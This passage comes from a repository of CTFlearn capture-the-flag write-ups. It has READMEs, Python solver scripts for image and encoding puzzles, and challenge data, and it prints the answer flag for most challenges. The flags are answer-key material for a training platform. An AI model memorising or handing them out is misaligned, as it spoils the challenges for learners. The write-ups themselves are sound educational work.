Reversing 10 | while sig_read: 11 | sig_rev += sig_read[::-1] 12 | sig_read = file.read(OFFSET) 13 | # Flag Output 14 | with open("Flag.jpeg", "wb") as newfile: 15 | newfile.write(sig_rev) -------------------------------------------------------------------------------- /Miscellaneous/F1L3 M1X3R/fl4g.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/F1L3 M1X3R/fl4g.jpeg -------------------------------------------------------------------------------- /Miscellaneous/Get Into Command Mission/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/Get Into Command Mission/Flag.png -------------------------------------------------------------------------------- /Miscellaneous/Get Into Command Mission/program.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/Get Into Command Mission/program.exe -------------------------------------------------------------------------------- /Miscellaneous/Help Bity/README.md: -------------------------------------------------------------------------------- 1 | ## Help Bity 2 | The main idea is to try to figure out what encryption is used on the flag. 3 | 4 | #### Step-1: 5 | I thought it was ROT47. It was not ROT47. 6 | 7 | #### Step-2: 8 | I used [CyberChef](https://gchq.github.io/CyberChef/)'s Magic option. [Here](https://gchq.github.io/CyberChef/#recipe=Magic(3,true,false,'CTF')&input=QlVHTWRgc296YzBvYHN4XjByXmB2ZHIxbGR8) is the full flag solve link. 9 | 10 | #### Step-3: 11 | Finally flag becomes: `CTFLearn{b1nary_1s_awes0me}` 12 | -------------------------------------------------------------------------------- /Miscellaneous/Practice Flag/README.md: -------------------------------------------------------------------------------- 1 | ## Practice Flag 2 | The main idea finding the flag is to have eyes. 3 | 4 | #### Step-1: 5 | 6 | The flag is already to given to you. Just paste it. 7 | 8 | #### Step-2: 9 | Finally the flag becomes: 10 | `flag{CTFLearn_is_awesome}` 11 | -------------------------------------------------------------------------------- /Miscellaneous/QR Code v2/Flag.txt: -------------------------------------------------------------------------------- 1 | CTF{2_QR_4_U} -------------------------------------------------------------------------------- /Miscellaneous/QR Code v2/README.md: -------------------------------------------------------------------------------- 1 | ## QR Code v2 2 | The main idea finding the flag is common sense. 3 | 4 | #### Step-1: 5 | After downloading `qr_code.jpg` from the cloud, I tried to scan it online. 6 | 7 | 8 | 9 | #### Step-2: 10 | I followed the URL: https://webqr.com/ 11 | 12 | I got the following result: 13 | 14 | 15 | 16 | We get another link from here: 17 | 18 | [https://mega.nz/#!9NFhUbwQ!vtrLVum8z-ZXzur33RrGJ4uivMJhA9_5TW2ulHucXoU](https://mega.nz/#!9NFhUbwQ!vtrLVum8z-ZXzur33RrGJ4uivMJhA9_5TW2ulHucXoU) 19 | #### Step-3: 20 | So I went to above URL and downloaded `Flag.txt`. 21 | 22 | It had the flag in it. That's it. 23 | 24 | #### Step-4: 25 | Finally the flag becomes: 26 | `CTF{2_QR_4_U}` -------------------------------------------------------------------------------- /Miscellaneous/QR Code v2/Scan.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/QR Code v2/Scan.png -------------------------------------------------------------------------------- /Miscellaneous/QR Code v2/qr_code.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/QR Code v2/qr_code.jpg -------------------------------------------------------------------------------- /Miscellaneous/QR Code/Base64.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/QR Code/Base64.png -------------------------------------------------------------------------------- /Miscellaneous/QR Code/README.md: -------------------------------------------------------------------------------- 1 | ## QR Code 2 | The main idea finding the flag is to decrypt multiple encryptions. 3 | 4 | #### Step-1: 5 | After downloading, `qrcode.39907201.png` from the cloud, my first try was to scan it online: 6 | 7 | 8 | 9 | #### Step-2: 10 | I followed the URL: https://webqr.com/index.html 11 | 12 | I got the following message after the scan: 13 | 14 | 15 | 16 | Message: `c3ludCB2ZiA6IGEwX29icWxfczBldHJnX2RlX3BicXI=`. 17 | 18 | This was clearly Base64 encrypted, which can be said by terminating '='. 19 | 20 | #### Step-3: 21 | So, I tried at this URL and tried to decode the flag: https://www.base64decode.org/ 22 | 23 | I got the following result: 24 | 25 | 26 | 27 | Decryption: `synt vf : a0_obql_s0etrg_de_pbqrgo`. 28 | 29 | I tried this as the flag, but unfortunately, it didn't work out. Now I thought that, this message itself could be encrypted and I got a sense of ROT13 there. If anyone is unaware of ROT13 encryption, they can check out here: https://en.wikipedia.org/wiki/ROT13 30 | 31 | 32 | #### Step-5: 33 | So for ROT13 decryption, I followed this URL: https://cryptii.com/. 34 | 35 | I got the following result: 36 | 37 | 38 | 39 | Voila, we have it. 40 | #### Step-6: 41 | 42 | Finally the flag becomes: 43 | `n0_body_f0rget_qr_code` -------------------------------------------------------------------------------- /Miscellaneous/QR Code/ROT13.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/QR Code/ROT13.png -------------------------------------------------------------------------------- /Miscellaneous/QR Code/Scan.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/QR Code/Scan.png -------------------------------------------------------------------------------- /Miscellaneous/QR Code/qrcode.39907201.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/QR Code/qrcode.39907201.png -------------------------------------------------------------------------------- /Miscellaneous/Reversal of fortune/README.md: -------------------------------------------------------------------------------- 1 | ## Reversal of fortune 2 | The main idea finding the flag is to be conscious. That's it. 3 | 4 | #### Step-1: 5 | After we read the given message: 6 | 7 | `.nac uoy fi tIe$reveRpilF eldnah ym gnisu em egassem ,avaj yllacificeps ,gnidoc emos htiw pleh deen I ,deifitnedi tegrat txeN` 8 | 9 | #### Step-2: 10 | This is simple reverse string. 11 | 12 | So reading it correctly, we get: 13 | 14 | `Next target identified, I need help ith some coding, specifically java, message me using my handle FlipRever$eIt if you can.` 15 | 16 | So I tried `FlipRever$eIt` as flag, and Voila, it works. 17 | 18 | #### Step-3: 19 | Finally the flag becomes: 20 | `CTFlearn{FlipRever$eIt}` 21 | -------------------------------------------------------------------------------- /Miscellaneous/Rock Paper Scissors/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/Rock Paper Scissors/Flag.png -------------------------------------------------------------------------------- /Miscellaneous/Rock Paper Scissors/README.md: -------------------------------------------------------------------------------- 1 | ## Rock Paper Scissors 2 | The main idea of finding the flag is recognizing a pattern to pwn. 3 | 4 | #### Step-1: 5 | After I input `nc 138.197.193.132 5001`, I tried various combinations to complete challenge. 6 | 7 | #### Step-2: 8 | It is easy to find a pattern because the pwn machine chooses a specific 'R' or 'P' or 'S' corresponding to a number. So, after matching the numbers with the machine's choice, I got this pattern to get 10 consecutive wins. 9 | 10 | ``` 11 | PRPSPPSPRP 12 | ``` 13 | 14 | 15 | 16 | #### Step-3: 17 | Finally, the flag becomes: 18 | `CTFlearn{r0ck_p4per_skiss0rs}` -------------------------------------------------------------------------------- /Miscellaneous/Time Traveller/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/Time Traveller/Flag.png -------------------------------------------------------------------------------- /Miscellaneous/Time Traveller/README.md: -------------------------------------------------------------------------------- 1 | ## Time Traveller 2 | The main idea of finding the flag is using Web Archive. 3 | 4 | #### Step-1: 5 | Let's take a trip to nasa.gov on December 31, 1996. If you can tell me what email NASA listed on their website, I'll provide you with 10 points. 6 | 7 | From the description, its clear that we have to access the [Web Archive](http://web.archive.org/) here. 8 | #### Step-2: 9 | So, I visited the given date: December 31, 1996 for [nasa.gov](nasa.gov) website. It was accessible here: http://web.archive.org/web/19961231235847/http://www.nasa.gov/ 10 | 11 | 12 | 13 | 14 | 15 | #### Step-3: 16 | Clearly, we can see the flag there. 17 | 18 | 19 | 20 | #### Step-4: 21 | Finally, the flag becomes: 22 | `today@nasa.gov` -------------------------------------------------------------------------------- /Miscellaneous/Time Traveller/Web1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/Time Traveller/Web1.png -------------------------------------------------------------------------------- /Miscellaneous/Time Traveller/Web2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/Time Traveller/Web2.png -------------------------------------------------------------------------------- /Miscellaneous/What could this be?/Input.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/What could this be?/Input.png -------------------------------------------------------------------------------- /Miscellaneous/What could this be?/Output.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/What could this be?/Output.png -------------------------------------------------------------------------------- /Miscellaneous/Where Can My Robot Go?/README.md: -------------------------------------------------------------------------------- 1 | ## Where Can My Robot Go? 2 | The main idea finding the flag using simple logic and some un-accessed web pages. 3 | 4 | #### Step-1: 5 | After we read question, there is literally no hint to go anywhere. So I tried 6 | `https://ctflearn.com/robots.txt` to get some hint. 7 | 8 | #### Step-2: 9 | It showed me following output: 10 | 11 | ```bash 12 | User-agent: * 13 | Disallow: /70r3hnanldfspufdsoifnlds.html 14 | ``` 15 | 16 | #### Step-3: 17 | So I went to that web page by: 18 | `https://ctflearn.com/70r3hnanldfspufdsoifnlds.html ` 19 | 20 | I got the flag there. 21 | #### Step-4: 22 | 23 | Finally the flag becomes: 24 | `CTFlearn{r0b0ts_4r3_th3_futur3}` 25 | -------------------------------------------------------------------------------- /Miscellaneous/Wikipedia/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/Wikipedia/1.png -------------------------------------------------------------------------------- /Miscellaneous/Wikipedia/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/Wikipedia/2.png -------------------------------------------------------------------------------- /Miscellaneous/Wikipedia/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Miscellaneous/Wikipedia/3.png -------------------------------------------------------------------------------- /Miscellaneous/Wikipedia/README.md: -------------------------------------------------------------------------------- 1 | ## Wikipedia 2 | The main idea finding the flag is explore more from the question. 3 | 4 | #### Step-1: 5 | First of all, I tried directly searching for the given IP Address, but that path led to nowhere. So next, I went to https://www.wikipedia.org/ to get answers. I tried to search given IP Address to search their database. 6 | 7 | 8 | 9 | 10 | #### Step-2: 11 | Upon searching the given domain, I get this search result, so I try to check up some links there. 12 | 13 | 14 | 15 | #### Step-3: 16 | 17 | When I tried the first link of https://en.wikipedia.org/w/index.php?title=Flag&diff=prev&oldid=676540540, 18 | I got the flag there: 19 | 20 | 21 | 22 | 23 | #### Step-4: 24 | Finally the flag becomes: 25 | `CTFlearn{cNi76bV2IVERlh97hP}` 26 | -------------------------------------------------------------------------------- /Programming/An Old Image/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Programming/An Old Image/Flag.png -------------------------------------------------------------------------------- /Programming/An Old Image/README.md: -------------------------------------------------------------------------------- 1 | ## An Old Image 2 | The main idea finding the flag using PIL library of image processing. 3 | 4 | #### Step-1: 5 | We are given `old_image.png` which is as follows: 6 | 7 | 8 | 9 | #### Step-2: 10 | The given image has the columns mixed. So, we basically iterate through the columns to replace all the contrasting pixels back to `255, 255, 255`. The script `exploit.py` can be used to proceed. 11 | 12 | ```py 13 | #!/bin/python3 14 | from PIL import Image 15 | 16 | old_img = Image.open('old_image.png') 17 | oldPixelLoad = old_img.load() 18 | 19 | img = Image.new(mode = "RGB", size = (old_img.width, old_img.height), color = (255, 255, 255)) 20 | pixelLoad = img.load() 21 | 22 | for x in range(old_img.width): 23 | for y in range(old_img.height): 24 | a = x 25 | b = y 26 | c = oldPixelLoad[x, y][0] 27 | d = oldPixelLoad[x, y][1] 28 | 29 | if a + b > 255: 30 | pixelLoad[c, d] = (255, 255, 255) 31 | else: 32 | pixelLoad[c, d] = (0, 0, 0) 33 | 34 | img.save("new_image.png") 35 | img.show() 36 | ``` 37 | 38 | #### Step-3: 39 | After executing the above script, we get a new image called `new_image.png` which is as follows: 40 | 41 | 42 | 43 | #### Step-4: 44 | The image is then scanned using an online tool called [Aspose](https://products.aspose.app/barcode/recognize) which decodes the QR code and gives out the flag. 45 | 46 | 47 | 48 | #### Step-5: 49 | Finally the flag becomes: 50 | `CTFlearn{how_can_swapping_columns_hide_a_qr_code}` -------------------------------------------------------------------------------- /Programming/An Old Image/exploit.py: -------------------------------------------------------------------------------- 1 | #!/bin/python3 2 | from PIL import Image 3 | 4 | old_img = Image.open('old_image.png') 5 | oldPixelLoad = old_img.load() 6 | 7 | img = Image.new(mode = "RGB", size = (old_img.width, old_img.height), color = (255, 255, 255)) 8 | pixelLoad = img.load() 9 | 10 | for x in range(old_img.width): 11 | for y in range(old_img.height): 12 | a = x 13 | b = y 14 | c = oldPixelLoad[x, y][0] 15 | d = oldPixelLoad[x, y][1] 16 | 17 | if a + b > 255: 18 | pixelLoad[c, d] = (255, 255, 255) 19 | else: 20 | pixelLoad[c, d] = (0, 0, 0) 21 | 22 | img.save("new_image.png") 23 | img.show() -------------------------------------------------------------------------------- /Programming/An Old Image/new_image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Programming/An Old Image/new_image.png -------------------------------------------------------------------------------- /Programming/An Old Image/old_image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Programming/An Old Image/old_image.png -------------------------------------------------------------------------------- /Programming/AndhraPradesh Assembler Chall/AndhraPradesh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Programming/AndhraPradesh Assembler Chall/AndhraPradesh -------------------------------------------------------------------------------- /Programming/AndhraPradesh Assembler Chall/AndhraPradesh.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Programming/AndhraPradesh Assembler Chall/AndhraPradesh.o -------------------------------------------------------------------------------- /Programming/AndhraPradesh Assembler Chall/AndhraPradesh.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Programming/AndhraPradesh Assembler Chall/AndhraPradesh.zip -------------------------------------------------------------------------------- /Programming/AndhraPradesh Assembler Chall/clnasm.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | set -x 4 | 5 | # rm AndhraPradesh 6 | 7 | nasm -f elf64 -F dwarf -o AndhraPradesh.o AndhraPradesh.asm 8 | 9 | ld AndhraPradesh.o -o AndhraPradesh 10 | 11 | set +x 12 | 13 | chmod +x AndhraPradesh 14 | ./AndhraPradesh 15 | echo $? 16 | 17 | 18 | -------------------------------------------------------------------------------- /Programming/Dawn's Lawn/Flag.py: -------------------------------------------------------------------------------- 1 | import numpy as np 2 | import sys 3 | 4 | with open(sys.argv[1]) as f: 5 | 6 | lines = f.read().split('\n') 7 | dim = len(lines[0]) 8 | 9 | conv = {'.': 0,'_': 1,'\\': 2, '-': 3, '/': 4, '|': 5, '*': 6} 10 | matrix = np.array([[conv[y] for y in x] for x in lines]) 11 | matrix -= 2 # Mow everything 12 | grow = np.tile(np.arange(dim-1, -1, -1), (dim, 1)) 13 | grow[matrix <= 0] = 0 # Don't grow on infertile land 14 | matrix += grow 15 | print("Flag: " + str((matrix >= 6).sum())) 16 | -------------------------------------------------------------------------------- /Programming/Dawn's Lawn/dawn2.txt: -------------------------------------------------------------------------------- 1 | \|*/|_|.-_\\|.|_.-// 2 | /-\_.--.|-_._\.-|/*- 3 | \\-|..-*-/__*--/.\*- 4 | _/\|.*.---___***_/\. 5 | _-|.\\././_/|.-|_\// 6 | _-*.\..**/|/**.\_./- 7 | |-*|*.-_-////.|**-|- 8 | *\|*_-|_\-|__\_.*.-| 9 | .*///*.*/*\_-\..*-** 10 | */_\-\.//--/||\\/_|_ 11 | *.**/--/**///./\\/-| 12 | /|.\-..*-./\..-|\.|| 13 | |\/\__|./*_-\|-/_*_\ 14 | .|///*-/\-/|*/*||*-* 15 | .\.|\/.*/--*.|\--\/\ 16 | /_/|_|_---\_\_.***.- 17 | |-.._.-*\|*_\/_|_\/* 18 | .\.|\|//_-|.*-*|\*|* 19 | _\/-|-_*\-\|-/-/-*.- 20 | -_..\_\_*\\-*__..*/- -------------------------------------------------------------------------------- /Programming/Fabio's Nachos/Base64.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Programming/Fabio's Nachos/Base64.png -------------------------------------------------------------------------------- /Programming/Fabio's Nachos/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Programming/Fabio's Nachos/Flag.png -------------------------------------------------------------------------------- /Programming/Fabio's Nachos/base.txt: -------------------------------------------------------------------------------- 1 | OTI3MzcyNjkyMTkzMDc4OTk5MTc2IDE2NjQxMDI3NzUwNjIwNTYzNjYyMDk2IDgzNjIxMTQzNDg5ODQ4NDIyOTc3IDE1MDA1MjA1MzYyMDY4OTYwODMyNzcgMjI2OTgzNzQwNTIwMDY4NjM5NTY5NzU2ODIgOTI3MzcyNjkyMTkzMDc4OTk5MTc2IDc3Nzg3NDIwNDkgMTM1MzAxODUyMzQ0NzA2NzQ2MDQ5IDQ4MDc1MjY5NzYgNDM1NjY3NzYyNTg4NTQ4NDQ3MzgxMDUgMzI5NTEyODAwOTkgMjE4OTIyOTk1ODM0NTU1MTY5MDI2IDI0Mjc4OTMyMjgzOTk5NzUwODI0NTMgNDgwNzUyNjk3NiA1OTQyNTExNDc1NzUxMjY0MzIxMjg3NTEyNQ== 2 | -------------------------------------------------------------------------------- /Programming/Fabio's Nachos/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import base64 3 | from Cryptodome.Util import number 4 | 5 | def find_fibonacci_index(values): 6 | ma = max(values) 7 | 8 | w = [0] * 100 9 | w[0] = 1 10 | w[1] = 1 11 | i = 2 12 | n = 0 13 | seq = [-1] * len(values) 14 | while n < ma: 15 | n = w[(i-1)%100] + w[(i-2)%100] 16 | w[i % 100] = n 17 | try: 18 | loc = -1 19 | while True: 20 | loc = values.index(n, loc+1, len(values)) 21 | seq[loc] = i+1 22 | except ValueError: 23 | pass 24 | finally: 25 | i += 1 26 | return seq 27 | 28 | buffer = open('base.txt', 'rb').read() 29 | values = base64.b64decode(buffer).split() 30 | values = list(map(int, values)) 31 | sequence = find_fibonacci_index(values) 32 | # print(sequence) 33 | print(''.join(map(chr, sequence))) 34 | -------------------------------------------------------------------------------- /Programming/Image Magic/ALTERNATE.md: -------------------------------------------------------------------------------- 1 | # Image Magic 2 | The main idea is finding the flag by doing image processing with Python libraries like numpy and pillow. 3 | 4 | #### Step-1: 5 | We download the image and see the image is giant line that's a single pixel tall: 6 | ![out copy](./out%20copy.jpg) 7 | 8 | #### Step-2: 9 | The first part of [`script.py`](./script.py) just counts how many pixels wide the image is. It outputs 27968 which will be useful later. 10 | ```python 11 | img = numpy.array(Image.open("out copy.jpg")) 12 | print(len(img[0])) 13 | ``` 14 | 15 | #### Step-3: 16 | ```python 17 | new = [] 18 | line = [] 19 | for i in range(len(img[0])): 20 | line.append(img[0][i]) 21 | if i%92 == 91: 22 | new.append(line) 23 | line = [] 24 | ``` 25 | This part of the script is supposed to reconstruct the image if it has a height of 304 as stated in [this comment](https://ctflearn.com/challenge/89/3000#comment-3000) 26 | 27 | #### Step-4: 28 | The final part of the script saves the flag in a new image. 29 | ```python 30 | new = numpy.array(new) 31 | Image.fromarray(new).save("flag.png") 32 | ``` 33 | ![flag](./flag.png) 34 | 35 | #### Step-5: 36 | Finally, the flag becomes: 37 | `flag{cool_right?}` -------------------------------------------------------------------------------- /Programming/Image Magic/Exploit.py: -------------------------------------------------------------------------------- 1 | from PIL import Image 2 | 3 | # Specs from old pic 4 | im = Image.open('out copy.jpg') 5 | pix_val = list(im.getdata()) 6 | splited = [pix_val[i::92] for i in range(92)] 7 | 8 | # Defining new pic 9 | h, w = 92, 304 10 | new_im = Image.new("RGB",(w, h)) 11 | pix = new_im.load() 12 | 13 | # Setting height and pixels 14 | for y in range(h): 15 | line = splited[y] 16 | for x in range(w): 17 | r, g, b = line[x] 18 | pix[x, y] = (r, g, b) 19 | 20 | # New Image 21 | new_im.save("Flag.jpg", "JPEG") 22 | -------------------------------------------------------------------------------- /Programming/Image Magic/Flag.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Programming/Image Magic/Flag.jpg -------------------------------------------------------------------------------- /Programming/Image Magic/README.md: -------------------------------------------------------------------------------- 1 | ## Image Magic 2 | The main idea finding the flag is get flag using PIL from Python. 3 | 4 | #### Step-1: 5 | After I downloaded `out copy.jpg`, it is clearly stretched. All we need to do is to set the pixel and realign. 6 | 7 | 8 | 9 | #### Step-2: 10 | 11 | So, I wrote `Exploit.py` with the help of PIL to get our flag. 12 | 13 | ```python 14 | from PIL import Image 15 | 16 | # Specs from old pic 17 | im = Image.open('out copy.jpg') 18 | pix_val = list(im.getdata()) 19 | splited = [pix_val[i::92] for i in range(92)] 20 | 21 | # Defining new pic 22 | h, w = 92, 304 23 | new_im = Image.new("RGB",(w, h)) 24 | pix = new_im.load() 25 | 26 | # Setting height and pixels 27 | for y in range(h): 28 | line = splited[y] 29 | for x in range(w): 30 | r, g, b = line[x] 31 | pix[x, y] = (r, g, b) 32 | 33 | # New Image 34 | new_im.save("Flag.jpg", "JPEG") 35 | ``` 36 | 37 | #### Step-3: 38 | After running this as `python3 Exploit.py`, I got the flag. 39 | 40 | 41 | 42 | #### Step-4: 43 | Finally the flag becomes: 44 | `flag{cool_right?}` -------------------------------------------------------------------------------- /Programming/Image Magic/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Programming/Image Magic/flag.png -------------------------------------------------------------------------------- /Programming/Image Magic/out copy.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Programming/Image Magic/out copy.jpg -------------------------------------------------------------------------------- /Programming/Image Magic/script.py: -------------------------------------------------------------------------------- 1 | import numpy 2 | from PIL import Image 3 | import matplotlib 4 | 5 | img = numpy.array(Image.open("out copy.jpg")) 6 | print(len(img[0])) 7 | new = [] 8 | line = [] 9 | for i in range(len(img[0])): 10 | line.append(img[0][i]) 11 | if i%92 == 91: 12 | new.append(line) 13 | line = [] 14 | new = numpy.array(new) 15 | Image.fromarray(new).save("flag.png") -------------------------------------------------------------------------------- /Programming/Is it the Flag? (JAVA)/IsItTheFlag.java: -------------------------------------------------------------------------------- 1 | public class IsItTheFlag { 2 | 3 | public static boolean isFlag(String str) { 4 | return str.hashCode() == 1471587914 && str.toLowerCase().hashCode() == 1472541258; 5 | } 6 | 7 | public static void main(String[] args) { 8 | 9 | String flag = "------"; 10 | 11 | if (isFlag(flag)) 12 | System.out.println("You found it!"); 13 | else 14 | System.out.println("Try again :("); 15 | 16 | } 17 | } -------------------------------------------------------------------------------- /Programming/Old memories/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Programming/Old memories/1.png -------------------------------------------------------------------------------- /Programming/Old memories/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Programming/Old memories/2.png -------------------------------------------------------------------------------- /Programming/Old memories/README.md: -------------------------------------------------------------------------------- 1 | ## Old memories 2 | 3 | #### Step-1: 4 | After downloading `hisss.zip`, I got 2 images `1.png` & `2.png` in it. 5 | 6 | 7 | 8 | 9 | 10 | #### Step-2: 11 | Now if we zoom in we see it some pixels manipulation done. So, I wrote a script `exploit.py` to get the flag. 12 | 13 | ```python 14 | from PIL import Image 15 | 16 | i1 = Image.open("1.png") 17 | i2 = Image.open("2.png") 18 | 19 | pixels = 512 20 | 21 | pix1 = i1.load() 22 | pix2 = i2.load() 23 | 24 | for i in range(pixels): 25 | for j in range(pixels): 26 | if pix1[i,j] == pix2[i,j]: 27 | pix1[i,j] = 0 28 | else: 29 | pix1[i,j] = 255 30 | 31 | i1.save("flag.png") 32 | ``` 33 | 34 | #### Step-3: 35 | After I ran this as `python3 exploit.py`, I got this image `flag.png` which had flag in it. 36 | 37 | 38 | 39 | 40 | #### Step-4: 41 | Finally, the flag becomes: 42 | `CTF{I_L0V3_PYTH0N}` -------------------------------------------------------------------------------- /Programming/Old memories/exploit.py: -------------------------------------------------------------------------------- 1 | from PIL import Image 2 | 3 | i1 = Image.open("1.png") 4 | i2 = Image.open("2.png") 5 | 6 | pixels = 512 7 | 8 | pix1 = i1.load() 9 | pix2 = i2.load() 10 | 11 | for i in range(pixels): 12 | for j in range(pixels): 13 | if pix1[i,j] == pix2[i,j]: 14 | pix1[i,j] = 0 15 | else: 16 | pix1[i,j] = 255 17 | 18 | i1.save("flag.png") 19 | -------------------------------------------------------------------------------- /Programming/Old memories/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Programming/Old memories/flag.png -------------------------------------------------------------------------------- /Programming/Old memories/hisss.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Programming/Old memories/hisss.zip -------------------------------------------------------------------------------- /Programming/Programming a language/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Programming/Programming a language/Flag.png -------------------------------------------------------------------------------- /Programming/Programming a language/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | s = "++++++++++++++++++++++++++++++++++++++++++++++++.++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++.++.----------->@>>.<@<<<.@<@<@<++++<.<@<@<<@<-----.<<<<<.<@<@<+<.+>@.-------.-------->>>.<@<@<++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++.++>>>.<@<@<<.-----------<.>@>@<@><<.>@>@++++<.>@-----.>>>.<@<@<+<.>@+.-------.--------.+++++++++++++>>>>>>.<@<@<@<@<@<<.>@++.-------<.>@+++++++<<<.>@>@>@<<.>@>@<.>@-<.>@++++++++++++<<<.>@>@>@+++++++++++€" 4 | 5 | values = [0] 6 | 7 | for a in s: 8 | if a == '+': 9 | values[-1] += 1 10 | elif a == '-': 11 | values[-1] -= 1 12 | elif a == '<': 13 | x = [values[-1]] 14 | x.extend(values[:-1]) 15 | values = x 16 | elif a == '@': 17 | values[-1], values[-2] = values[-2], values[-1] 18 | elif a == '>': 19 | values.append(values[0]) 20 | values = values[1:] 21 | elif a == '.': 22 | values.append(values[-1]) 23 | else: # a == '€': 24 | #print(''.join(map(chr, values))) 25 | flag = ''.join(map(chr, values)) 26 | print("Flag: CTFlearn{" + flag + "}") -------------------------------------------------------------------------------- /Programming/Programming a language/input.txt: -------------------------------------------------------------------------------- 1 | 